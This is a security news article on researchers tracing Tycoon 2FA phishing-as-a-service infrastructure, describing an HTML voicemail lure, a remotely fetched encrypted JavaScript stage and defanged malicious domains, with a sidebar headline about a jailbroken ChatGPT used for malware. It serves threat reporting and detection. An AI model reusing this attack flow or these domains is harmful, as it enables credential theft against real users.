Thursday, January 23, 2025
HomeCyber Security NewsResearchers Uncover Phishing-As-A-Service Domains Associated With Tycoon 2FA

Researchers Uncover Phishing-As-A-Service Domains Associated With Tycoon 2FA

Published on

SIEM as a Service

Follow Us on Google News

The Tycoon 2FA platform is a Phishing-as-a-Service (PhaaS) tool that enables cybercriminals to easily launch sophisticated phishing attacks targeting two-factor authentication (2FA). 

It provides a service that simplifies the process for attackers. and offers an intuitive interface, allowing for the creation of customized phishing templates that mimic legitimate 2FA requests. 

Tycoon 2FA also integrates automated features, streamlining the delivery and management of phishing campaigns, which significantly lowers the barrier to entry for launching large-scale and effective 2FA phishing attacks that pose a serious threat to organizations and individuals.

HTML file sent to the victim.
HTML file sent to the victim.

Dynamic analysis reveals that the HTML lure displays a fake voicemail page before redirecting the victim to an Outlook phishing site, while static analysis shows the HTML file contains a variable to store the victim’s email and a base64-encoded blob. 

Decoding the blob reveals two parts: a base64-encoded HTML code for the fake voicemail page and JavaScript code, which is fetched from a remote server (disruptgive[.]com/res444.php) after a four-second delay, likely to execute malicious actions on the victim’s system.

Dynamic analysis of the HTML lure sent via email to the victim.
Dynamic analysis of the HTML lure sent via email to the victim.

An obfuscated JavaScript that contains a Base64-encoded string is returned by the PHP endpoint, which contains the values that are used for AES decryption, which are the key (B + D) and IV (C). 

The Python script decrypts the JavaScript, revealing its purpose. The decrypted script checks for the presence of the character ‘#’ in the string “VBsazFxAoBQotTgF.” 

Failing to find it, the script constructs a link to [https://mvz.nvkhytoypg](https://mvz.nvkhytoypg)[.]ru/9SIt8c/ concatenated with “VBsazFxAoBQotTgF,” and then replaces the page’s body with this link and simulates a click, effectively redirecting the user to the generated URL.

Decrypted JavaScript returned by the PHP URL.
Decrypted JavaScript returned by the PHP URL.

This phishing campaign leverages a multi-stage attack flow, where the initial stage involves enticing victims to click on malicious links, which redirect them to phishing pages designed to steal credentials that are hosted on various domains. 

Through the process of analyzing the attack flow, security researchers were able to determine that the malicious scripts were delivered by the attackers through the use of a PHP file with the name “res444.php.”

Parameters given to the second stage phishing URL
Parameters given to the second stage phishing URL

Validin investigation revealed that this PHP file is used across multiple domains, indicating a shared infrastructure, and the attackers also employed a generic template for the phishing pages, providing another valuable clue for identifying related domains. 

By combining these findings and searching for specific parameters within the PHP file, security researchers can effectively hunt for and disrupt the broader Tycoon 2FA infrastructure.

Investigate Real-World Malicious Links, Malware & Phishing Attacks With ANY.RUN – Try for Free

Aman Mishra
Aman Mishra
Aman Mishra is a Security and privacy Reporter covering various data breach, cyber crime, malware, & vulnerability.

Latest articles

Critical Vulnerability in Next.js Framework Exposes Websites to Cache Poisoning and XSS Attacks

A new report has put the spotlight on potential security vulnerabilities within the popular...

New Cookie Sandwich Technique Allows Stealing of HttpOnly Cookies

The "Cookie Sandwich Attack" showcases a sophisticated way of exploiting inconsistencies in cookie parsing...

GhostGPT – Jailbreaked ChatGPT that Creates Malware & Exploits

Artificial intelligence (AI) tools have revolutionized how we approach everyday tasks, but they also...

Tycoon 2FA Phishing Kit Using Specially Crafted Code to Evade Detection

The rapid evolution of Phishing-as-a-Service (PhaaS) platforms is reshaping the threat landscape, enabling attackers...

API Security Webinar

Free Webinar - DevSecOps Hacks

By embedding security into your CI/CD workflows, you can shift left, streamline your DevSecOps processes, and release secure applications faster—all while saving time and resources.

In this webinar, join Phani Deepak Akella ( VP of Marketing ) and Karthik Krishnamoorthy (CTO), Indusface as they explores best practices for integrating application security into your CI/CD workflows using tools like Jenkins and Jira.

Discussion points

Automate security scans as part of the CI/CD pipeline.
Get real-time, actionable insights into vulnerabilities.
Prioritize and track fixes directly in Jira, enhancing collaboration.
Reduce risks and costs by addressing vulnerabilities pre-production.

More like this

GhostGPT – Jailbreaked ChatGPT that Creates Malware & Exploits

Artificial intelligence (AI) tools have revolutionized how we approach everyday tasks, but they also...

Tycoon 2FA Phishing Kit Using Specially Crafted Code to Evade Detection

The rapid evolution of Phishing-as-a-Service (PhaaS) platforms is reshaping the threat landscape, enabling attackers...

Microsoft Unveils New Identity Secure Score Recommendations in General Availability

Microsoft has announced the general availability of 11 new Identity Secure Score recommendations in...